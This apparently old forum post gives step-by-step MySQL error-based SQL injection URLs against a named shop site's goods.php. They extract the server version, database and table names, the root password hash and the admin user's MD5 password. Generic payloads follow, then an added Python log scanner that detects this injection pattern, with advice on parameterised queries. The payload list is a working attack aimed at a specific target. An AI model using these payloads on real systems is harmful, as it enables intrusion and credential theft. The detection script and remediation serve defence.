Blind injection details

Posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
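Every request in this post uses the same primitive: a subquery grouped on concat(<value>, floor(rand()*2)) so that MySQL raises a duplicate-key error whose message carries the selected value. Since the leak travels in the error text, the HTTP status code is not a reliable signal for a defender; the request shape is. The script below is an added example and not code from the original post: it parses Common/Combined Log Format lines, percent-decodes the query string (including double encoding), flags requests carrying that floor(rand()) plus GROUP BY signature, and labels what each one tries to read. The log lines are constructed for the example (RFC 5737 addresses, the post's own date), and the target labels and function names are my own.

```python
"""Flag MySQL error-based (duplicate-key) SQL injection attempts in web access logs.

Added example for this post, not code from the original. Log lines below are
constructed; the IP addresses come from the RFC 5737 documentation ranges.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Core signature of the primitive used by every request in the post:
# count(*) over a subquery grouped on concat(<value>, floor(rand()*2)).
CORE = [
    ("rand_floor", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("group_by", re.compile(r"\bgroup\s+by\b", re.I)),
    ("count_star", re.compile(r"count\s*\(\s*\*\s*\)", re.I)),
]

# Labels for what the request tries to read; these names are my own (hypothetical).
TARGETS = [
    ("server_fingerprint", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("identity", re.compile(r"\buser\s*\(\s*\)|\bdatabase\s*\(\s*\)", re.I)),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns|schemata)", re.I)),
    ("credential_read", re.compile(r"mysql\.user|\bpassword\b", re.I)),
]

# Common Log Format / Combined Log Format request line.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_query(target):
    """Return the fully percent-decoded query string of a request target.

    Decoding is repeated so that double-encoded payloads (%2520) are
    normalised before the signature check.
    """
    query = urlsplit(target).query
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify(query):
    """Return (flagged, matched_core_signatures, target_labels) for a decoded query."""
    core = [name for name, rx in CORE if rx.search(query)]
    targets = [name for name, rx in TARGETS if rx.search(query)]
    # floor(rand()) together with GROUP BY is the duplicate-key primitive itself;
    # either token alone occurs in legitimate input, so both are required.
    flagged = "rand_floor" in core and "group_by" in core
    return flagged, core, targets


def scan_log(lines):
    """Parse access-log lines and return one finding per flagged request."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        flagged, core, targets = classify(decode_query(m["target"]))
        if flagged:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "core": core, "targets": targets,
            })
    return findings


# Constructed sample log: the second and third lines mirror the request shape
# shown in the post, the others are benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    # Status 200: a PHP app that prints the MySQL error still answers 200, so status is no signal.
    '198.51.100.7 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 200 1893',
    # Double-encoded spaces (%2520) and a column enumeration against information_schema.
    '198.51.100.7 - - [05/Sep/2012:15:02:41 +0800] "GET /goods.php?id=352&wsid=1%2520and%2520(1,1)%3E(select%2520count(*),concat((select%2520COLUMN_NAME%2520from%2520information_schema.COLUMNS%2520limit%25201),0x3a,floor(rand()*2))%2520x%2520from%2520(select%25201%2520union%2520select%25202)%2520a%2520group%2520by%2520x)%2523 HTTP/1.1" 200 1893',
    # Benign search containing SQL-looking words; must not be flagged.
    '203.0.113.9 - - [05/Sep/2012:15:05:00 +0800] "GET /search.php?q=group+by+floor+plan HTTP/1.1" 200 8801',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} core={f['core']} targets={f['targets']}")
```

A hit is corroborated by the application's own error output, where this primitive produces a MySQL "Duplicate entry ... for key 'group_key'" message. The fix on the application side is a parameterised query for the id and wsid parameters and never echoing database errors to the client, which removes the channel the leak depends on.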